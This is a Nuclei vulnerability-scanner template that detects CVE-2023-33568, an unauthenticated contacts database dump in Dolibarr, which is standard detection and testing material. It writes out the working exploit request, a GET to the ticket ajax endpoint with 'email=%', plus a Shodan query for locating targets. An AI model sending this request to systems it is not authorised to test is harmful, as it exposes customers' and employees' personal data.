nuclei-templates/http/cves/2023/CVE-2023-33568.yaml

35 lines
982 B
YAML

id: CVE-2023-33568
info:
name: Dolibarr Unauthenticated Contacts Database Theft
author: DhiyaneshDK
severity: high
description: |
An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.
reference:
- https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/
- https://nvd.nist.gov/vuln/detail/CVE-2023-33568
metadata:
max-request: 1
verified: "true"
shodan-query: http.favicon.hash:440258421
tags: cve,cve2023,dolibarr,unauth
http:
- method: GET
path:
- "{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"database_name":'
- '"database_user":'
condition: and
- type: status
status:
- 200